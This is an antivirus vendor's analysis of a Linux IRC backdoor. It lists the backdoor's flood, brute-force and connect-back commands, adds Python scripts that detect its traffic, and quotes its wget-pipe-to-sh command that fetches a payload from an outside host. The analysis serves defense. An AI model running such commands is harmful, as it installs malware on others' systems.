Linux.BackDoor.Tsunami.150

Added to the Dr.Web virus database: 2015-07-23

Virus description added:

SHA1:

  • 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
  • 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)

A backdoor for Linux that is installed on the system by Linux.PNScan.1. It uses "/var/run/.boss.pid" as a lock file.

To connect to the IRC server, the Trojan generates the name and nickname string as follows:

m64|dog|root|%c%c%c%c%c%c%c%c%c

where each %c is a random digit from the set "0123456789".

If the connection attempt is successful, the malicious program sends the following commands to the server:

NICK <nick>\n
USER x00 localhost localhost :dogscan\n

where <nick> indicates a nickname generated as described above.
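The registration exchange above is the most stable network indicator in this description, so the following added example (written for this page, not code from Dr.Web or from the malware) checks a client-to-server IRC capture for it. The description's nickname notation "m64|dog|root|%c%c%c%c%c%c%c%c%c" does not say whether "|" is a literal separator or marks alternatives, so the regex is written, as an assumption, to accept both readings; the sample capture is constructed.

```python
import re

# Registration line the backdoor sends after connecting (from the description).
TSUNAMI_USER_LINE = "USER x00 localhost localhost :dogscan"

# Nickname pattern. The description writes it as "m64|dog|root|%c%c%c%c%c%c%c%c%c"
# where each %c is a digit from "0123456789". It does not say whether "|" is a
# literal separator or marks alternatives, so this regex (an assumption made
# here) accepts both readings: the literal "m64|dog|root|" prefix, or one of
# "m64", "dog", "root", each followed by exactly nine digits.
TSUNAMI_NICK_RE = re.compile(r"^(?:m64\|dog\|root\||m64|dog|root)[0-9]{9}$")


def is_tsunami_nick(nick: str) -> bool:
    """True if a nickname matches the generation pattern in the description."""
    return TSUNAMI_NICK_RE.fullmatch(nick) is not None


def scan_irc_registration(lines):
    """Inspect client->server IRC lines and return (line_no, reason) findings.

    Only the NICK and USER registration lines are looked at; everything else
    is skipped, so the check is cheap enough to run over a full capture.
    """
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        line = raw.rstrip("\r\n")
        if line.startswith("NICK "):
            nick = line[len("NICK "):].strip()
            if is_tsunami_nick(nick):
                findings.append((line_no, f"nick matches Tsunami pattern: {nick}"))
        elif line == TSUNAMI_USER_LINE:
            findings.append((line_no, "USER line matches Linux.BackDoor.Tsunami.150"))
    return findings


# Constructed sample capture (not from the page): a normal client followed by
# a registration that looks like the backdoor's.
SAMPLE_CAPTURE = [
    "NICK alice\r\n",
    "USER alice 0 * :Alice\r\n",
    "NICK dog493027165\r\n",
    "USER x00 localhost localhost :dogscan\r\n",
    "JOIN #somechannel\r\n",
]

if __name__ == "__main__":
    for line_no, reason in scan_irc_registration(SAMPLE_CAPTURE):
        print(f"line {line_no}: {reason}")
```

A USER line hit on its own is the stronger of the two signals; the nickname check exists mainly to pair a NICK line with it, since a nine-digit suffix after a short word will occasionally appear in legitimate traffic.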

After establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

Command | Action                                       | Comments
--------|----------------------------------------------|----------------------------------------
352     | Set a fake IP                                |
376     | Join the channel                             | Send(fd, "MODE %s -xi\n", nick);
        |                                              | Send(fd, "MODE %s +B\n", nick);
        |                                              | Send(fd, "JOIN %s :%s\n", chan, pass);
433     | Generate a new nickname                      |
ERROR   | Generate a new nickname                      |
422     | Join the channel                             | Send(fd, "MODE %s -xi\n", nick);
        |                                              | Send(fd, "MODE %s +B\n", nick);
        |                                              | Send(fd, "JOIN %s :%s\n", chan, pass);
NICK    | Take a string from the command as a nickname |
PING    | Send PONG                                    |
PRIVMSG | Execute a special command                    |

Moreover, the Trojan can execute a number of extended commands.

Command | Action | Syntax
--------|--------|-------
RANDOMFLOOD | Randomly switch between ACK and SYN Flood | RANDOMFLOOD <target> <port> <secs>
NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs>
NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs>
ACKFLOOD | ACK Flood (spoofed) |
SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs>
UDP | UDP Flood | UDP <target> <port> <secs>
UNKNOWN | Launch a DDoS attack | UNKNOWN <target> <secs>
SERVER | Change the server to the one specified in the command |
GETSPOOFS | Get spoofing parameters |
SPOOFS | Set an IP or an IP range for spoofing | SPOOFS <iprange/ip>
GET | Download a specified file | GET <url> <save as>
VERSION | Return the backdoor's version |
KILLALL | Terminate a DDoS attack |
HELP | Display the list of available commands |
CBACK | Connect back | CBACK <ip> <port> connectback shell
SCANRND | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used) | SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes>
SCANRND2 | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a dictionary specified in the incoming parameters is used) | SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>
SCANSUB | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary) | SCANSUB <192.168> <threads>
SCANSUB2 | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a dictionary specified in the incoming parameters) | SCANSUB2 <192.168> <threads> <user> <passwd>
DOGRND | Brute-force SSH credentials (random IP addresses are chosen from an IP range, and a standard dictionary is used) | DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes>
DOGSUB | Brute-force SSH credentials (the Trojan goes through all IP addresses from an IP range using a standard dictionary) | DOGSUB <192.168> <threads>
IRC | Send specified IRC commands to the server | IRC <arg1> <arg2> <arg...>
SH | Execute a set of SH commands | SH <arg1> <arg2> <arg...>

Once a login:password combination is found, SCANRND, SCANRND2, SCANSUB and SCANSUB2 execute the following command on the remote system:

wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>&1

or

wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>&1

Downloaded scripts install Linux.BackDoor.Tsunami.144 on the system.

Once a login:password combination is found, DOGRND and DOGSUB execute the following command:

uname -a || echo - 

After that, the "##scaninfo##" user receives the following information in the IRC chat:

[g+] <login>@<ip> | <password> | <os> \n
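Two things in the extended-command table and the scan-report format above are worth turning into analysis logic for captured channel traffic: flagging PRIVMSG lines that carry one of the listed command keywords or the stage-2 download host, and parsing the "[g+]" credential reports so that the hosts they name can be identified and notified. The following added example does both; it is written for this page and is not code from Dr.Web or from the malware. The keyword split into "strong" and "weak" sets, the PRIVMSG parsing and the sample session are all assumptions made here, not part of the description.

```python
import re

# Extended command keywords from the description, split by how distinctive
# they are (this split is an assumption made here): the flood/scan names
# rarely appear in ordinary chat, while the generic ones (HELP, GET, UDP, ...)
# need nick or channel context before they mean anything. The backdoor's
# commands are uppercase, so matching is case-sensitive on purpose.
STRONG_COMMANDS = {
    "RANDOMFLOOD", "NSACKFLOOD", "NSSYNFLOOD", "ACKFLOOD", "SYNFLOOD",
    "GETSPOOFS", "SPOOFS", "KILLALL", "CBACK",
    "SCANRND", "SCANRND2", "SCANSUB", "SCANSUB2", "DOGRND", "DOGSUB",
}
WEAK_COMMANDS = {"UDP", "UNKNOWN", "SERVER", "GET", "VERSION", "HELP", "IRC", "SH"}

# Host the description reports for the stage-2 download (bbsh / wgsh scripts).
STAGE2_HOST = "104.199.135.124"

# Server->client PRIVMSG as seen on the wire: ":sender!user@host PRIVMSG target :text"
PRIVMSG_RE = re.compile(
    r"^(?::(?P<sender>[^!\s]+)\S* )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$"
)

# Report format from the description: "[g+] <login>@<ip> | <password> | <os> "
# (note the trailing space before the newline; <os> is "-" when uname failed).
REPORT_RE = re.compile(
    r"^\[g\+\] (?P<login>[^@\s]+)@(?P<ip>\S+) \| (?P<password>.*?) \| (?P<os>.*?)\s*$"
)


def parse_privmsg(line):
    """Return {'sender','target','text'} for a PRIVMSG line, else None."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def parse_scan_report(text):
    """Return {'login','ip','password','os'} for a [g+] report, else None."""
    m = REPORT_RE.match(text)
    return m.groupdict() if m else None


def classify_privmsg(line):
    """Return (severity, detail) for one IRC line, or None if nothing matched."""
    msg = parse_privmsg(line)
    if msg is None:
        return None
    text = msg["text"]
    report = parse_scan_report(text)
    if report is not None:
        return ("high", f"credential report to {msg['target']}: "
                        f"{report['login']}@{report['ip']} ({report['os']})")
    if STAGE2_HOST in text:
        return ("high", f"reference to stage-2 host {STAGE2_HOST}")
    first = text.split(" ", 1)[0]
    if first in STRONG_COMMANDS:
        return ("high", f"bot command {first!r} sent to {msg['target']}")
    if first in WEAK_COMMANDS:
        return ("low", f"possible bot command {first!r} sent to {msg['target']} "
                       "(generic keyword, needs context)")
    return None


def extract_compromised_hosts(lines):
    """Collect every host named in a [g+] report, for victim notification."""
    hosts = []
    for line in lines:
        msg = parse_privmsg(line)
        if msg is None:
            continue
        report = parse_scan_report(msg["text"])
        if report is not None:
            hosts.append({"ip": report["ip"], "login": report["login"], "os": report["os"]})
    return hosts


# Constructed sample session (not from the page).
SAMPLE_SESSION = [
    ":alice!a@example.net PRIVMSG #chat :get some rest everyone\r\n",
    ":c2!x00@localhost PRIVMSG #chan :SCANRND 192.168 10 30\r\n",
    ":c2!x00@localhost PRIVMSG #chan :HELP\r\n",
    ":dog493027165!x00@localhost PRIVMSG ##scaninfo## :[g+] root@10.0.0.5 | toor | Linux box 3.10.0 x86_64 \r\n",
    ":dog493027165!x00@localhost PRIVMSG ##scaninfo## :[g+] admin@10.0.0.9 | admin | - \r\n",
    "PING :irc.example.net\r\n",
]

if __name__ == "__main__":
    for line in SAMPLE_SESSION:
        hit = classify_privmsg(line)
        if hit:
            print(hit[0], hit[1])
    print(extract_compromised_hosts(SAMPLE_SESSION))
```

The report parser deliberately keeps the password field so that an incident responder can tell whether a default or reused credential was the entry point, but anything written to a ticket or a notification should carry only the login, IP and OS fields.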

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
